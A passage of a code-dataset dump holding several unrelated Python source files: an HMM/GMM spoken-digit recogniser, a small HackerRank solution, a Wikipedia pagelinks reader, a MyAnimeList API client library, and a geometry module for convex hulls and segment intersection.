np.expand_dims(gamma[:, k], axis=1)), axis=0)\n\n self.r = np.divide(r_num, denom)\n return\n\n def train(self, data):\n # Function for training single modal Gaussian\n gamma = self.e_step(data)\n self.m_step(data, gamma)\n\n def loglike(self, data_mat):\n # Function for calculating log likelihood of single modal Gaussian\n ll = 0\n for t in range(data_mat.shape[0]):\n ll_t = np.array([np.log(self.omega[k]) + compute_ll(data_mat[t], self.mu[k], self.r[k])\n for k in range(self.ncomp)])\n ll_t = logSumExp(ll_t)\n ll += ll_t\n return ll\n\n\nclass HMM():\n\n def __init__(self, sg_model, nstate):\n # Basic class variable initialized, feel free to add more\n self.pi = np.zeros(nstate)\n self.pi[0] = 1\n self.nstate = nstate\n\n self.mu = np.tile(sg_model.mu, (nstate, 1))\n self.r = np.tile(sg_model.r, (nstate, 1))\n\n def initStates(self, data):\n self.states = []\n for data_u in data:\n T = data_u.shape[0]\n state_seq = np.array([self.nstate * t / T for t in range(T)], dtype=int)\n self.states.append(state_seq)\n\n def viterbi(self, data):\n for u, data_u in enumerate(data):\n T = data_u.shape[0]\n J = self.nstate\n s_hat = np.zeros(T, dtype=int)\n\n log_delta = np.zeros((T, J))\n psi = np.zeros((T, J))\n\n log_delta[0] = elog(self.pi)\n for j in range(J):\n log_delta[0, j] += compute_ll(data_u[0], self.mu[j], self.r[j])\n\n log_A = elog(self.A)\n # print(self.A)\n for t in range(1, T):\n for j in range(J):\n temp = np.zeros(J)\n for i in range(J):\n temp[i] = log_delta[t - 1, i] + log_A[i, j] + compute_ll(data_u[t], self.mu[j], self.r[j])\n log_delta[t, j] = np.max(temp)\n psi[t, j] = np.argmax(log_delta[t - 1] + log_A[:, j])\n\n s_hat[T - 1] = np.argmax(log_delta[T - 1])\n\n for t in reversed(range(T - 1)):\n s_hat[t] = psi[t + 1, s_hat[t + 1]]\n\n self.states[u] = s_hat\n\n def m_step(self, data):\n\n self.A = np.zeros((self.nstate, self.nstate))\n\n gamma_0 = np.zeros(self.nstate)\n gamma_1 = np.zeros((self.nstate, data[0].shape[1]))\n gamma_2 = np.zeros((self.nstate, data[0].shape[1]))\n\n for u, data_u in enumerate(data):\n T = data_u.shape[0]\n seq = self.states[u]\n gamma = np.zeros((T, self.nstate))\n\n for t, j in enumerate(seq[:-1]):\n self.A[j, seq[t + 1]] += 1\n gamma[t, j] = 1\n\n gamma[T - 1, self.nstate - 1] = 1\n gamma_0 += np.sum(gamma, axis=0)\n\n for t in range(T):\n gamma_1[seq[t]] += data_u[t]\n gamma_2[seq[t]] += np.square(data_u[t])\n\n gamma_0 = np.expand_dims(gamma_0, axis=1)\n self.mu = gamma_1 / gamma_0\n self.r = (gamma_2 - np.multiply(gamma_0, self.mu ** 2)) / gamma_0\n\n for j in range(self.nstate):\n self.A[j] /= np.sum(self.A[j])\n\n def train(self, data, iter):\n # Function for training single modal Gaussian\n if (iter == 0):\n self.initStates(data)\n self.m_step(data)\n self.viterbi(data)\n\n def loglike(self, data):\n # Function for calculating log likelihood of single modal Gaussian\n T = data.shape[0]\n log_alpha_t = forward(self.pi, self.A, data, self.mu, self.r)[T - 1]\n ll = logSumExp(log_alpha_t)\n\n return ll\n\n\ndef sg_train(digits, train_data):\n model = {}\n for digit in digits:\n model[digit] = SingleGauss()\n\n for digit in digits:\n data = np.vstack([train_data[id] for id in train_data.keys() if digit in id.split('_')[1]])\n logging.info(\"process %d data for digit %s\", len(data), digit)\n model[digit].train(data)\n\n return model\n\n\ndef gmm_train(digits, train_data, sg_model, ncomp, niter):\n logging.info(\"Gaussian mixture training, %d components, %d iterations\", ncomp, niter)\n\n gmm_model = {}\n for digit in digits:\n gmm_model[digit] = GMM(sg_model[digit], ncomp=ncomp)\n\n i = 0\n while i < niter:\n logging.info(\"iteration: %d\", i)\n total_log_like = 0.0\n for digit in digits:\n data = np.vstack([train_data[id] for id in train_data.keys() if digit in id.split('_')[1]])\n logging.info(\"process %d data for digit %s\", len(data), digit)\n\n gmm_model[digit].train(data)\n\n total_log_like += gmm_model[digit].loglike(data)\n logging.info(\"log likelihood: %f\", total_log_like)\n i += 1\n\n return gmm_model\n\n\ndef hmm_train(digits, train_data, sg_model, nstate, niter):\n logging.info(\"hidden Markov model training, %d states, %d iterations\", nstate, niter)\n\n hmm_model = {}\n data_dict = {}\n for digit in digits:\n hmm_model[digit] = HMM(sg_model[digit], nstate=nstate)\n data = [train_data[id] for id in train_data.keys() if digit in id.split('_')[1]]\n data_dict[digit] = data\n\n i = 0\n while i < niter:\n logging.info(\"iteration: %d\", i)\n total_log_like = 0.0\n total_count = 0.0\n for digit in digits:\n data = data_dict[digit]\n logging.info(\"process %d data for digit %s\", len(data), digit)\n\n hmm_model[digit].train(data, i)\n\n for data_u in data:\n total_log_like += hmm_model[digit].loglike(data_u)\n\n logging.info(\"log likelihood: %f\", total_log_like)\n i += 1\n\n return hmm_model\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('train', type=str, help='training data')\n parser.add_argument('test', type=str, help='test data')\n parser.add_argument('--niter', type=int, default=10)\n parser.add_argument('--nstate', type=int, default=5)\n parser.add_argument('--ncomp', type=int, default=8)\n parser.add_argument('--mode', type=str, default='sg',\n choices=['sg', 'gmm', 'hmm'],\n help='Type of models')\n parser.add_argument('--debug', action='store_true')\n args = parser.parse_args()\n\n # set seed\n np.random.seed(777)\n\n # logging info\n log_format = \"%(asctime)s (%(module)s:%(lineno)d) %(levelname)s:%(message)s\"\n logging.basicConfig(level=logging.INFO, format=log_format)\n\n digits = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"z\", \"o\"]\n\n # read training data\n with open(args.train) as f:\n train_data = get_data_dict(f.readlines())\n # for debug - use only 100 files\n if args.debug:\n #train_data = {key: train_data[key] for key in list(train_data.keys())[:100]}\n train_data = {key: train_data[key] for key in list(train_data.keys())}\n\n # read test data\n with open(args.test) as f:\n test_data = get_data_dict(f.readlines())\n # for debug\n if args.debug:\n #test_data = {key: test_data[key] for key in list(test_data.keys())[:100]}\n test_data = {key: test_data[key] for key in list(test_data.keys())}\n\n # Single Gaussian\n sg_model = sg_train(digits, train_data)\n\n if args.mode == 'sg':\n model = sg_model\n elif args.mode == 'hmm':\n model = hmm_train(digits, train_data, sg_model, args.nstate, args.niter)\n elif args.mode == 'gmm':\n model = gmm_train(digits, train_data, sg_model, args.ncomp, args.niter)\n\n # test data performance\n total_count = 0\n correct = 0\n for key in test_data.keys():\n lls = []\n for digit in digits:\n ll = model[digit].loglike(test_data[key])\n lls.append(ll)\n predict = digits[np.argmax(np.array(lls))]\n log_like = np.max(np.array(lls))\n\n logging.info(\"predict %s for utt %s (log like = %f)\", predict, key, log_like)\n if predict in key.split('_')[1]:\n correct += 1\n total_count += 1\n\n logging.info(\"accuracy: %f\", float(correct / total_count * 100))","repo_name":"yuweiwan/ASR-SG-HMM-GMM","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12765,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"40777874847","text":"#findDigits.py\n\n\ndef findDigits(n):\n numbers = list(map(int, str(n)))\n divisors = 0\n for num in range (len(numbers)):\n if numbers[num] != 0:\n if n % numbers[num] ==0:\n divisors += 1\n return divisors\n\nn = 123\nprint (findDigits(n))\n","repo_name":"OzRhodes/Hackerrank","sub_path":"findDigits.py","file_name":"findDigits.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74002242329","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 11 21:45:04 2018\n\n@author: lixiaodan\nget data set : https://dumps.wikimedia.org/enwiki/latest/\nreference : https://github.com/sharnett/wiki_pagerank\nhttp://snap.stanford.edu/data/wiki-meta.html\n\"\"\"\n\n\n\"THis file is to process network features\"\nfilename = \"/Users/lixiaodan/Desktop/wikipedia_project/dataset/wiki_pageLinks/tlwiki-latest-pagelinks.sql\"\nfd = open(filename, 'r', encoding=\"ISO-8859-1\")\nsqlFile = fd.read()\nsqlCommands = sqlFile.split(';')\nfor pageLink in fd:\n print(pageLink)\nfd.close()","repo_name":"Daniellee1990/Wikipeida_quality_analysis","sub_path":"network_features.py","file_name":"network_features.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"26673567144","text":"\"\"\"Module in charge of making requests to the API and managing possible errors.\"\"\"\nimport requests\nimport logging\nfrom typing import Any, List, Dict, Optional, Sequence, Union\n\nfrom .endpoints import Endpoint\nfrom .anime import Anime, AnimeSearchResults, AnimeList, AnimeRanking, Seasonal\nfrom .manga import Manga, MangaSearchResults, MangaList, MangaRanking\nfrom .forum import BoardCategory, ForumTopics, Discussion\nfrom .enums import (Field, AnimeListStatus, MangaListStatus, Season,\n AnimeRankingType, MangaRankingType, AnimeListSort, MangaListSort,\n SeasonalAnimeSort)\nfrom .utils import MISSING\n\n_log = logging.getLogger(__name__)\n\n\nclass Client:\n \"\"\"Offers the interface to make requests.\"\"\"\n\n def __init__(self, client_id: str):\n self.__client_id: str = client_id\n self._session: requests.Session = requests.Session()\n self._session.headers.update({'X-MAL-CLIENT-ID': self.__client_id})\n self._limit: int = 10\n self._anime_fields: List[Field] = Field.default_anime()\n self._manga_fields: List[Field] = Field.default_manga()\n self._include_nsfw: bool = False\n\n @property\n def limit(self) -> int:\n \"\"\"Maximum number of results per page. Defaults to 10. Can be changed\n to any positive integer, it will be automatically adjusted to fit within\n the API limits.\n\n Raises:\n ValueError: if a negative value is passed\n \"\"\"\n return self._limit\n\n @limit.setter\n def limit(self, value: int) -> None:\n if value < 0:\n raise ValueError('limit must be a positive integer')\n self._limit = int(value)\n _log.info(\n f'parameter \"search_limit\" default value set to {self._limit}')\n\n @property\n def anime_fields(self) -> List[Field]:\n \"\"\"Fields that are requested in a anime query. This value is used in the following\n methods:\n - anime_search\n - get_anime\n - get_anime_list\n - get_seasonal_anime\n - get_anime_ranking\n\n Changes to this value are applied to all subsequent requests. Invalid fields\n are automatically ignored.\n It is possible to override this value per request by specifying the `fields` parameter.\n \"\"\"\n return self._anime_fields\n\n @anime_fields.setter\n def anime_fields(self, new_fields: Sequence[Union[Field, str]]) -> None:\n fields = Field.from_list(new_fields)\n self._anime_fields = [f for f in fields if f.is_anime]\n _log.info(\n f'parameter \"anime_fields\" default value set to {self._anime_fields}')\n\n @property\n def manga_fields(self) -> List[Field]:\n \"\"\"Fields that are requested in a manga query. This value is used in the following\n methods:\n - manga_search\n - get_manga\n - get_manga_list\n - get_manga_ranking\n\n Changes to this value are applied to all subsequent requests. Invalid fields\n are automatically ignored.\n It is possible to override this value per request by specifying the `fields` parameter.\n \"\"\"\n return self._manga_fields\n\n @manga_fields.setter\n def manga_fields(self, new_fields: Sequence[Union[Field, str]]) -> None:\n fields = Field.from_list(new_fields)\n self._manga_fields = [f for f in fields if f.is_manga]\n _log.info(\n f'parameter \"manga_fields\" default value set to {self._manga_fields}')\n\n @property\n def include_nsfw(self) -> bool:\n \"\"\"Specifies whether to include results marked as nsfw. Defaults to False.\n\n Changes to this value are applied to all subsequent requests.\n It is possible to override this value per request by specifying the `nsfw` parameter.\n \"\"\"\n return self._include_nsfw\n\n @include_nsfw.setter\n def include_nsfw(self, value: bool) -> None:\n self._include_nsfw = value\n _log.info(f'parameter \"nsfw\" default value set to {value}')\n\n def anime_search(\n self,\n query: str,\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n include_nsfw: bool = MISSING\n ) -> AnimeSearchResults:\n \"\"\"Search anime matching the given query. By default it uses the default parameters\n or the ones that have been set in limit and fields. If you pass limit and fields to this\n method they are used for this query only.\n\n Args:\n query: string used to search titles, betwneen 3 and 64 characters\n\n Keyword args:\n limit: maximum number of results, needs to be between 1 and 100\n offset: get results at a certain offset from the start, defaults to 0\n fields: the fields that are going to be requested, for a complete list see Field enum\n include_nsfw: include results marked as nsfw\n\n Returns:\n AnimeSearchResults: iterable object containing the results\n\n Raises:\n ValueError: when the query is not between 3 and 64 characters\n \"\"\"\n if len(query) > 64 or len(query) < 3:\n raise ValueError(\n 'query parameter needs to be between 3 and 64 characters long')\n parameters = self._build_parameters(\n Endpoint.ANIME, query=query, limit=limit, offset=offset, fields=fields, nsfw=include_nsfw)\n url: str = Endpoint.ANIME.url\n response = self._request(url, params=parameters)\n data = response.json()\n results = AnimeSearchResults(data)\n return results\n\n def manga_search(\n self,\n query: str,\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n include_nsfw: bool = MISSING\n ) -> MangaSearchResults:\n \"\"\"Search manga matching the given query. By default it uses the default parameters\n or the ones that have been set in limit and fields. If you pass limit and fields to this\n method they are used for this query only.\n\n Args:\n query: string used to search titles, betwneen 3 and 64 characters\n\n Keyword args:\n limit: maximum number of results, needs to be between 1 and 100\n offset: get results at a certain offset from the start, defaults to 0\n fields: the fields that are going to be requested, for a complete list see Field enum\n include_nsfw: include results marked as nsfw\n\n Returns:\n MangaSearchResults: iterable object containing the results\n\n Raises:\n ValueError: when the query is not between 3 and 64 characters\n \"\"\"\n if len(query) > 64 or len(query) < 3:\n raise ValueError(\n 'query parameter needs to be between 3 and 64 characters long')\n parameters = self._build_parameters(\n Endpoint.MANGA, query=query, limit=limit, offset=offset, fields=fields, nsfw=include_nsfw)\n url: str = Endpoint.MANGA.url\n response = self._request(url, params=parameters)\n data = response.json()\n results = MangaSearchResults(data)\n return results\n\n def get_anime(self, id: Union[int, str], *, fields: Sequence[Union[Field, str]] = MISSING) -> Anime:\n \"\"\"Get the details for a specific anime given the id.\n\n Args:\n id: the id of the anime or the url of its MAL page\n\n Keyword args:\n fields: list of fields to retrieve for this request\n\n Returns:\n Anime: the anime object with all the details\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.ANIME, fields=fields)\n url: str = Endpoint.ANIME.url + '/' + self._get_as_id(id)\n response = self._request(url, params=parameters)\n data = response.json()\n return Anime(data)\n\n def get_manga(self, id: Union[int, str], *, fields: Sequence[Union[Field, str]] = MISSING) -> Manga:\n \"\"\"Get the details for a specific manga given the id.\n\n Args:\n id: the id of the manga or the url of its MAL page\n\n Keyword args:\n fields: list of fields to retrieve for this request\n\n Returns:\n Manga: the anime object with all the details\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.ANIME, fields=fields)\n url: str = Endpoint.MANGA.url + '/' + self._get_as_id(id)\n response = self._request(url, params=parameters)\n data = response.json()\n return Manga(data)\n\n def get_anime_list(\n self,\n username: str,\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n status: Union[AnimeListStatus, str] = MISSING,\n sort: Union[AnimeListSort, str] = MISSING,\n include_nsfw: bool = MISSING\n ) -> AnimeList:\n \"\"\"Returns the anime list of a specific user, if public.\n\n Args:\n username: the MAL username of the user, case insensitive\n\n Keyword args:\n limit: set the number of entries to retrieve, defaults to 10\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n status: return only a specific category. will return all if omitted\n sort: specify the sorting of the list\n include_nsfw: include results marked as nsfw\n\n Returns:\n AnimeList: iterable with all the entries of the list\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.USER_ANIMELIST, limit=limit, offset=offset, fields=fields, status=status, nsfw=include_nsfw, sort=sort)\n url = Endpoint.USER_ANIMELIST.url.replace('{username}', username)\n response = self._request(url, params=parameters)\n data = response.json()\n return AnimeList(data)\n\n def get_manga_list(\n self,\n username: str,\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n status: Union[MangaListStatus, str] = MISSING,\n sort: Union[MangaListSort, str] = MISSING,\n include_nsfw: bool = MISSING\n ) -> MangaList:\n \"\"\"Returns the manga list of a specific user, if public.\n\n Args:\n username: the MAL username of the user, case insensitive\n\n Keyword args:\n limit: set the number of entries to retrieve, defaults to 10\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n status: return only a specific category. will return all if omitted\n sort: specify the sorting of the list\n include_nsfw: include results marked as nsfw\n\n Returns:\n MangaList: iterable with all the entries of the list\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.USER_MANGALIST, limit=limit, offset=offset, fields=fields, status=status, nsfw=include_nsfw, sort=sort)\n url = Endpoint.USER_MANGALIST.url.replace('{username}', username)\n response = self._request(url, params=parameters)\n data = response.json()\n return MangaList(data)\n\n def get_seasonal_anime(\n self,\n year: int,\n season: Union[str, Season],\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n sort: Union[SeasonalAnimeSort, str] = MISSING,\n include_nsfw: bool = MISSING\n ) -> Seasonal:\n \"\"\"Returns the list of anime aired during a specific season.\n\n Args:\n year: the desired year\n season: the desired season, can be winter, spring, summer or fall.\n | In particular they correspond to specific months\n | winter -> January, February, March\n | spring -> April, May, June\n | summer -> July, August, September\n | fall -> October, November, December\n\n Keyword args:\n limit: set the number of entries to retrieve, defaults to 10\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n sort: how to sort the results\n include_nsfw: include results marked as nsfw\n\n Returns:\n Seasonal: container for the results, sorted by score\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.ANIME_SEASONAL, limit=limit, offset=offset, fields=fields, sort=sort, nsfw=include_nsfw)\n url = f'{Endpoint.ANIME_SEASONAL}/{year}/{season}'\n response = self._request(url, params=parameters)\n data = response.json()\n results: Seasonal = Seasonal(data)\n return results\n\n def get_anime_ranking(\n self,\n *,\n ranking_type: Union[str, AnimeRankingType] = AnimeRankingType.all,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING\n ) -> AnimeRanking:\n \"\"\"Returns the top anime in the rankings.\n\n Keyword args:\n ranking_type: the type of ranking to request, defaults to all.\n For all possible values see enums.AnimeRanking\n limit: numbers of entries to request\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n\n Returns:\n AnimeRanking: the results\n\n Raises:\n ValueError: ranking_type is invalid, check AnimeRankingType for all options\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.ANIME_RANKING, limit=limit, offset=offset, fields=fields)\n if isinstance(ranking_type, str):\n ranking_type = AnimeRankingType(ranking_type)\n parameters['ranking_type'] = f'{ranking_type}'\n url: str = Endpoint.ANIME_RANKING.url\n response = self._request(url, params=parameters)\n data = response.json()\n ranking = AnimeRanking(data)\n ranking.type = ranking_type\n return ranking\n\n def get_manga_ranking(\n self,\n *,\n ranking_type: Union[str, MangaRankingType] = MangaRankingType.all,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING\n ) -> MangaRanking:\n \"\"\"Returns the top manga in the rankings.\n\n Keyword args:\n ranking_type: the type of ranking to request, defaults to all.\n For all possible values see enums.MangaRanking\n limit: numbers of entries to request\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n\n Returns:\n MangaRanking: the results\n\n Raises:\n ValueError: ranking_type is invalid, check MangaRankingType for all options\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.MANGA_RANKING, limit=limit, offset=offset, fields=fields)\n if isinstance(ranking_type, str):\n ranking_type = MangaRankingType(ranking_type)\n parameters['ranking_type'] = f'{ranking_type}'\n url: str = Endpoint.MANGA_RANKING.url\n response = self._request(url, params=parameters)\n data = response.json()\n ranking = MangaRanking(data)\n ranking.type = ranking_type\n return ranking\n\n def get_boards(self) -> Sequence[BoardCategory]:\n \"\"\"Returns a list of the forum boards divided by category.\"\"\"\n url: str = Endpoint.FORUM_BOARDS.url\n response = self._request(url)\n data = response.json()\n categories: List[BoardCategory] = []\n for category in data['categories']:\n categories.append(BoardCategory(category))\n return categories\n\n def get_topics(\n self,\n *,\n query: str = MISSING,\n board_id: int = MISSING,\n subboard_id: int = MISSING,\n limit: int = MISSING,\n offset: int = MISSING,\n topic_user_name: str = MISSING,\n user_name: str = MISSING\n ) -> ForumTopics:\n \"\"\"Returns all the topics matching the given parameters. At least one of the arguments\n must be specified.\n\n Keyword Args:\n query: query used to search topics, minimum length 3 characters\n board_id: limit the search to a specific board\n subboard_id: limit the search to a specific subboard\n limit: maximum number of results, between 1 and 100\n offset: get results at a certain offset from the start, defaults to 0\n topic_user_name: return only topics started by a specific user\n user_name: return topics where the user has partecipated\n NOTE: the difference between topic_user_name and user_name is not clear\n to get all posts by a user use only topic_user_name\n\n Raises:\n ValueError: no argument was specified\n \"\"\"\n parameters = self._build_parameters(Endpoint.FORUM_TOPICS, query=query, board_id=board_id,\n subboard_id=subboard_id, limit=limit, offset=offset,\n topic_user_name=topic_user_name, user_name=user_name)\n url: str = Endpoint.FORUM_TOPICS.url\n response = self._request(url, params=parameters)\n data = response.json()\n return ForumTopics(data, query)\n\n def get_topic_details(\n self,\n topic_id: int,\n *,\n limit: int = MISSING,\n offset: int = MISSING\n ) -> Discussion:\n \"\"\"Returns all the details on a given topic.\n\n Args:\n topic_id: required, the id of the topic to request\n\n Keyword Args:\n limit: the number of posts to retrieve, defaults to 100\n offset: get results at a certain offset from the start, defaults to 0\n \"\"\"\n parameters: Dict[str, str] = {}\n if limit is not MISSING:\n parameters['limit'] = str(self._get_limit(\n Endpoint.FORUM_TOPIC_DETAIL, limit))\n if offset is not MISSING:\n parameters['offset'] = str(offset)\n url: str = f'{Endpoint.FORUM_TOPIC_DETAIL}/{topic_id}'\n response = self._request(url, params=parameters)\n data = response.json()\n return Discussion(data['data'])\n\n def get_url(self, url: Optional[str]) -> Any:\n \"\"\"Get the raw json data from the given url. Mostly for internal use.\"\"\"\n if url is None:\n return None\n response = self._session.get(url)\n _log.info(f'Fetching url: {url}')\n if response.status_code != requests.codes.ok:\n _log.error(\n f'Request to {url} errored with code {response.status_code}')\n response.raise_for_status()\n return response.json()\n\n def _request(self, url: str, params: Dict[str, str] = MISSING) -> requests.Response:\n \"\"\"Handles all the requests that are made and checks the status code of the response.\n If a requests raises an exception it is propagated.\n \"\"\"\n if params is not MISSING:\n response = self._session.get(url, params=params)\n else:\n response = self._session.get(url)\n if response.status_code != requests.codes.ok:\n _log.error(\n f'Request to {url} with parameters {params} errored with code {response.status_code}')\n response.raise_for_status() # TODO: handle error and possible retries\n return response\n\n def _build_parameters(\n self,\n endpoint: Endpoint,\n *,\n query: str = MISSING,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n nsfw: bool = MISSING,\n status: Union[AnimeListStatus, MangaListStatus, str] = MISSING,\n sort: Union[AnimeListSort, MangaListSort,\n SeasonalAnimeSort, str] = MISSING,\n board_id: int = MISSING,\n subboard_id: int = MISSING,\n topic_user_name: str = MISSING,\n user_name: str = MISSING\n ) -> Dict[str, str]:\n parameters: Dict[str, str] = {}\n if not endpoint.is_forum:\n if query is not MISSING:\n parameters['q'] = query\n if limit is not MISSING:\n parameters['limit'] = str(self._get_limit(endpoint, limit))\n else:\n parameters['limit'] = str(self._limit)\n if offset is not MISSING:\n parameters['offset'] = str(offset)\n if fields is not MISSING:\n parsed_fields = Field.from_list(fields)\n if endpoint.is_anime:\n parameters['fields'] = ','.join(\n [f.value for f in parsed_fields if f.is_anime])\n else:\n parameters['fields'] = ','.join(\n [f.value for f in parsed_fields if f.is_manga])\n if endpoint.is_list:\n parameters['fields'] += ',list_status'\n else:\n if endpoint.is_anime:\n parameters['fields'] = ','.join(\n [f.value for f in self._anime_fields])\n else:\n parameters['fields'] = ','.join(\n [f.value for f in self._manga_fields])\n if endpoint.is_list:\n parameters['fields'] += ',list_status'\n if status is not MISSING:\n if isinstance(status, str):\n value = status\n else:\n value = status.value\n parameters['status'] = value\n if sort is not MISSING:\n if isinstance(sort, str):\n value = sort # NOTE: how can i validate the string?\n else:\n value = sort.value\n parameters['sort'] = value\n # nsfw overrides the value stored in self.include_nsfw\n if nsfw is MISSING:\n if self.include_nsfw:\n parameters['nsfw'] = 'true'\n elif nsfw:\n parameters['nsfw'] = 'true'\n else: # forum endpoint\n if query is not MISSING:\n parameters['q'] = query\n if board_id is not MISSING:\n parameters['board_id'] = str(board_id)\n if subboard_id is not MISSING:\n parameters['subboard_id'] = str(subboard_id)\n if limit is not MISSING:\n parameters['limit'] = str(self._get_limit(endpoint, limit))\n if offset is not MISSING:\n parameters['offset'] = str(offset)\n if topic_user_name is not MISSING:\n parameters['topic_user_name'] = topic_user_name\n if user_name is not MISSING:\n parameters['user_name'] = user_name\n if not parameters:\n raise ValueError(\n 'At least one parameter must be specified to search topics.')\n return parameters\n\n def _get_limit(self, endpoint: Endpoint, value: int) -> int:\n \"\"\"Check that the value of the parameter limit is within\n the correct interval for the given endpoint. If the value is outside\n the closest value inside the interval is returned.\n \"\"\"\n limit = 1\n if value < 1:\n limit = 1\n elif value > endpoint.limit:\n limit = endpoint.limit\n else:\n limit = value\n return limit\n\n def _get_as_id(self, value: Union[int, str]) -> str:\n \"\"\"Returns the string representing the id that can be used\n to build the url to request. Accepts both int or an url of the\n MAL page.\n \"\"\"\n if isinstance(value, int):\n return str(value)\n # extract the id from the url\n # need to extract the value between the last two slashes\n # example https://myanimelist.net/anime/16498/Shingeki_no_Kyojin -> 16498\n _ = value.split('/')\n return _[-2]\n","repo_name":"Skylake-dev/mal.py","sub_path":"mal/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":24380,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"36389446336","text":"#!/usr/bin/python3\n\n\"\"\"This is a library that provides geometry classes and functions\n\n It is a part of mammoth-world project\n (https://github.com/vasalf/mammoth-world)\n\n\"\"\"\n\nfrom random import *\nfrom math import log\n\n\"\"\"A place to import modules is up to that comment.\n\n\"\"\"\n\n__author__ = \"vasalf\"\n\n\ndef cross_product(a, b):\n return a[0] * b[1] - b[0] * a[1]\n\n\ndef dot_product(a, b):\n return a[0] * b[0] + a[1] * b[1]\n\n\ndef sq_point_distance(a, b):\n x = a[0] - b[0]\n y = a[1] - b[1]\n return x * x + y * y\n\n\ndef vector(a, b):\n return (b[0] - a[0], b[1] - a[1])\n\n\nclass __sorted_by_polar_angle_point:\n \"\"\"This is a helper class to convex\n\n \"\"\"\n def __init__(self, p, first):\n self.__pt = p[:]\n self.__first = first[:]\n\n def __getitem__(self, i):\n return self.__pt[i]\n\n def __lt__(self, other):\n if cross_product(vector(self.__first, self),\n vector(self.__first, other)) == 0:\n return sq_point_distance(self.__first, self) < \\\n sq_point_distance(self.__first, other)\n else:\n return cross_product(vector(self.__first, self),\n vector(self.__first, other)) > 0\n\n def __tuple__(self):\n return self.__pt\n\n\ndef convex(point_set):\n \"\"\"That functions builds the convex of a point_set.\n It uses Graham algotirhm.\n\n \"\"\"\n start = min(point_set)\n set_copy = []\n for p in point_set:\n set_copy.append(__sorted_by_polar_angle_point(p, start))\n set_copy.sort()\n set_copy.append(start)\n res = set_copy[:2]\n for p in set_copy[2:]:\n while len(res) >= 2 and \\\n cross_product(vector(res[-1], res[-2]), vector(res[-1], p)) >= 0:\n res.pop()\n res.append(p)\n return list(map(tuple, res[:-1]))\n\n\ndef unite(lst):\n res = []\n for pol in lst:\n for p in pol:\n res.append(p)\n return res\n\n\n\"\"\"Here are some geometry helper functions\n\n\"\"\"\n\n\ndef is_point_in_segment(p, a, b):\n return cross_product(vector(p, a), vector(p, b)) == 0 and \\\n dot_product(vector(p, a), vector(p, b)) <= 0\n\n\ndef do_segments_intersect(a, b, c, d):\n if cross_product(vector(a, b), vector(c, d)) == 0:\n return is_point_in_segment(a, c, d) or \\\n is_point_in_segment(b, c, d) or \\\n is_point_in_segment(c, a, b) or \\\n is_point_in_segment(d, a, b)\n else:\n return cross_product(vector(a, c), vector(a, b)) * \\\n cross_product(vector(a, b), vector(a, d)) >= 0 and \\\n cross_product(vector(c, a), vector(c, d)) * \\\n cross_product(vector(c, d), vector(c, b)) >= 0\n\n\ndef do_segments_strongly_intersect(a, b, c, d):\n if not do_segments_intersect(a, b, c, d):\n return False\n if cross_product(vector(a, b), vector(c, d)) == 0:\n if a == c:\n return not is_point_in_segment(d, a, b) and \\\n not is_point_in_segment(b, c, d)\n if a == d:\n return not is_point_in_segment(c, a, b) and \\\n not is_point_in_segment(b, c, d)\n if b == c:\n return not is_point_in_segment(d, a, b) and \\\n not is_point_in_segment(a, c, d)\n if c == d:\n return not is_point_in_segment(c, a, b) and \\\n not is_point_in_segment(a, c, d)\n return not is_point_in_segment(a, c, d) and \\\n not is_point_in_segment(b, c, d) and \\\n not is_point_in_segment(c, a, b) and \\\n not is_point_in_segment(d, a, b)\n\n\ndef signum(a):\n if a < 0:\n return -1\n elif a == 0:\n return 0\n else:\n return 1\n\n\ndef do_segment_and_hor_ray_intersect(p, a, b):\n q = p[0] + 1, p[1]\n if b[1] == p[1]:\n return False\n return signum(cross_product(vector(p, q), vector(p, a))) != \\\n signum(cross_product(vector(p, q), vector(p, b))) and \\\n cross_product(vector(p, a), vector(p, b)) > 0\n\n\ndef is_point_in_polygon(p, lst):\n num = 0\n for i in range(len(lst)):\n if is_point_in_segment(p, lst[i - 1], lst[i]):\n return True\n if lst[i][1] == lst[i - 1][1]:\n continue\n if lst[i - 1][1] > lst[i][1] and \\\n do_segment_and_hor_ray_intersect(p, lst[i], lst[i - 1]):\n num += 1\n elif lst[i - 1][1] < lst[i][1] and \\\n do_segment_and_hor_ray_intersect(p, lst[i - 1], 